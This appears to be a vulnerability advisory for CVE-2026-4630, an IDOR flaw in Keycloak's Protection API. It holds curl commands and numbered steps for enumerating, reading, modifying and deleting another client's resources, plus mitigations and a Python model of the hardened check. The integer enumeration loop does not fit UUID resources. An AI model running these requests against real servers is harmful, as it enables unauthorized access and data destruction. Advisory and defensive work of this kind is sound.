Keycloak (Red Hat Build of Keycloak), IDOR Authorization Bypass, CVE-2026-4630 (Medium) -DC-Jun2026-175


CVE-2026-4630 is a medium‑severity IDOR (Insecure Direct Object Reference) vulnerability in Keycloak’s Authorization Services Protection API endpoint. The flaw allows an authenticated client to bypass authorization checks by manipulating the unique identifier (UUID) of a resource.
Under normal operation, Keycloak enforces resource ownership: a client can only access resources it owns. However, the Protection API endpoint fails to validate whether the provided resource UUID belongs to the requesting client. An attacker who knows or can guess a UUID belonging to another resource server within the same realm can directly reference that resource in a request. Because the API trusts the user‑supplied key without proper cross‑checking, the attacker’s request is processed as if it were legitimate.
The vulnerability stems from CWE‑639: Authorization Bypass Through User‑Controlled Key. The affected component is the resource management API (specifically the ResourceService). The endpoint expects a valid protection token but does not verify that the resource referenced in the request actually belongs to the client that owns the token. This oversight enables an authenticated client to issue unauthorized GET, PUT, and DELETE requests on arbitrary resources, leading to information disclosure, data tampering, or resource deletion.
The attack vector is network‑based, requires low privileges, and has high attack complexity. Successful exploitation does not require user interaction and leaves availability unaffected, but confidentiality and integrity are both compromised.

DailyCVE Form:

Platform: Red Hat Keycloak
Version: / (all)
Vulnerability: IDOR in Protection
Severity: Medium (CVSS 6.8)
Date: May 19, 2026

Prediction: June 3, 2026

What Undercode Say:

# Enumerate resources via brute-force UUID
for uuid in $(seq 1 1000); do
curl -X GET "https://keycloak.example.com/auth/realms/demo/protection/resource_set/$uuid" \
-H "Authorization: Bearer $TOKEN"
done
# Exploit IDOR to fetch foreign resource
curl -X GET "https://keycloak.example.com/auth/realms/demo/protection/resource_set/94f7a1e2-3b4c-5d6e-7f8a-9b0c1d2e3f4a" \
-H "Authorization: Bearer $TOKEN_CLIENT_A"
# Modify foreign resource
curl -X PUT "https://keycloak.example.com/auth/realms/demo/protection/resource_set/94f7a1e2-3b4c-5d6e-7f8a-9b0c1d2e3f4a" \
-H "Authorization: Bearer $TOKEN_CLIENT_A" \
-H "Content-Type: application/json" \
-d '{"name":"modified_resource","type":"urn:demo:resources:example"}'
# Delete foreign resource
curl -X DELETE "https://keycloak.example.com/auth/realms/demo/protection/resource_set/94f7a1e2-3b4c-5d6e-7f8a-9b0c1d2e3f4a" \
-H "Authorization: Bearer $TOKEN_CLIENT_A"

Exploit:

  1. Realm configuration: Two clients (clientA, clientB) with Authorization Services enabled and allowRemoteResourceManagement=true.
  2. Obtain UUID: Create a resource under `clientB` and note its UUID.
  3. Acquire token: Request a `client_credentials` token for clientA.
  4. Craft request: Send a GET, PUT, or DELETE request to the Protection API endpoint using clientA’s token but referencing clientB’s resource UUID.
  5. Success: The API returns the resource data (GET), updates it (PUT), or deletes it (DELETE) without authorization.

Protection:

  • Upgrade Keycloak to a version containing the upstream fix for this IDOR.
  • Set `allowRemoteResourceManagement=false` unless remote management is absolutely necessary.
  • Apply strict resource ownership validation on the API endpoint (i.e., ensure the resource UUID belongs to the client identified by the token).
  • Monitor logs for anomalous GET/PUT/DELETE requests to resource endpoints.
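As an added example (not Keycloak's own code), a minimal Python model of the `resource_set/{uuid}` endpoint shows the CWE-639 pattern beside the hardened lookup that scopes the resource by the client identified in the token; the `client_id` claim, the in-memory store and the status codes are assumptions for illustration.

```python
import uuid
from dataclasses import dataclass
from typing import Optional

@dataclass
class Resource:
    id: str
    owner_client: str   # resource server that registered the resource
    name: str

@dataclass
class ProtectionToken:
    client_id: str      # client the protection token was issued to (assumed claim)

class ResourceStore:
    # Constructed in-memory stand-in for the Protection API resource endpoint.
    def __init__(self) -> None:
        self._by_id: dict[str, Resource] = {}
        self.denials: list[tuple[str, str, str]] = []   # (client, method, uuid) for monitoring

    def register(self, owner_client: str, name: str) -> Resource:
        res = Resource(str(uuid.uuid4()), owner_client, name)
        self._by_id[res.id] = res
        return res

    # CWE-639 pattern: the caller-supplied UUID is the only key; the token is never consulted.
    def get_vulnerable(self, token: ProtectionToken, rid: str) -> Optional[Resource]:
        return self._by_id.get(rid)

    # Hardened lookup: the owner taken from the token is part of the key, so a UUID
    # registered by another client resolves to "not found" instead of to its data.
    def _owned(self, token: ProtectionToken, rid: str) -> Optional[Resource]:
        res = self._by_id.get(rid)
        return res if res is not None and res.owner_client == token.client_id else None

    def handle(self, token: ProtectionToken, method: str, rid: str,
               body: Optional[dict] = None) -> tuple[int, Optional[Resource]]:
        res = self._owned(token, rid)
        if res is None:
            # Same 404 for "does not exist" and "not yours": no existence oracle for UUID guessing.
            self.denials.append((token.client_id, method, rid))
            return 404, None
        if method == "GET":
            return 200, res
        if method == "PUT":
            res.name = body["name"]
            return 200, res
        if method == "DELETE":
            del self._by_id[rid]
            return 204, None
        return 405, None
```

The `denials` list is the hook for the log-monitoring item above: repeated 404s from one client against many distinct UUIDs is the signature to alert on.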

Impact:

  • Confidentiality: An attacker can read resources belonging to any other resource server in the same realm.
  • Integrity: Unauthorized modification or deletion of resources is possible, affecting data consistency and availability of the resources themselves.
  • Privilege escalation: The vulnerability effectively elevates the privileges of any authenticated client, allowing it to act as a resource owner for any resource in the realm.


Sources:

Reported By: nvd.nist.gov
